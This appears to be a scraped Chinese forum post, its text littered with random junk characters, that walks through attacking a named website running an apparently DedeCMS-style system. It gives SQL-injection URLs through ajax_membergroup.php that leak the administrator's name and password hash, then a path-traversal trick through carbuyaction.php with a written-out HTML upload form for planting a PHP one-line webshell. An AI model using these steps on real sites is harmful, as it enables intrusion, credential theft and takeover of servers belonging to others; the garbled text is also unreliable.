①注入漏洞。
1 o* I7 h U. {$ d7 Z- h这站 http://www.political-security.com/% X( X8 c! A7 P1 E Z# f" u
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
1 J2 y% a7 W/ u6 E2 e1 Q2 Bwww.political-security.com/data/mysql_error_trace.inc 爆后台
$ _' }& U9 Z1 |6 K- X7 V然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
& Q0 k* [8 b! l0 U然后写上语句
6 e; R3 n! ]6 V- H& C查看管理员帐号& D1 C: @' K c5 u4 C
http://www.political-security.co ... &membergroup=@`
9 c1 f4 }1 H: ]! y }/ H& Q4 t) i- ]
admin : E5 }1 A; S6 }3 Z; l0 F* |
2 d% C& u' s* h
查看管理员密码* _( O+ h: t1 {3 c3 ?0 m3 S
http://www.political-security.co ... &membergroup=@`6 j4 ?) e: _( d, w; n+ O
3 q% A! c0 [- p# i! b! d- T$ U
8d29b1ef9f8c5a5af4295 e9 z# \; b2 ~# d' j) X, }
% o9 a8 v6 O% s. S* L& D
查看管理员密码
# G0 d7 r2 E* e& J! ^+ C9 l1 a+ W$ m" G1 C+ s: X8 j
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5& `$ B+ t! i7 O+ r' L. B8 o
( V; {& I' C) [9 F$ a3 S" L
8d2
! [. h: V* q- s O% x" k9b1ef9f8c5a5af42/ d$ A# c- e* F$ v
9
) D* B ^; h; v- U1 W" J) T( K! e3 m" S6 M* S. h
cmd5没解出来 只好测试第二个方法1 d g! v7 g, _. P" K/ R
- C- j$ B& w- D$ Z
! f5 p. N8 c; v" J( z②上传漏洞:& k+ H7 o. X% _- c0 }& d
0 w0 C) k. e4 U& e; K+ s只要登陆会员中心,然后访问页面链接6 |' T0 l6 c& L1 g
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
: z0 k( ^0 y/ j. L' _: _7 |) X* F% H
1 R3 k5 |$ K9 n+ [9 v如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
- D) K- ?4 E' h- ^' P2 B! l: Q' N% O! t. E
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm/ \, f }( { \4 r' R: o+ s2 Z7 G
5 C. L/ `4 K K4 o; s G3 g$ ?! t<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
3 P0 ^7 {' B) k( N P/ ^# @7 P或者( Q; O% x$ U( w, u# i' D+ m+ P
即可上传成功 |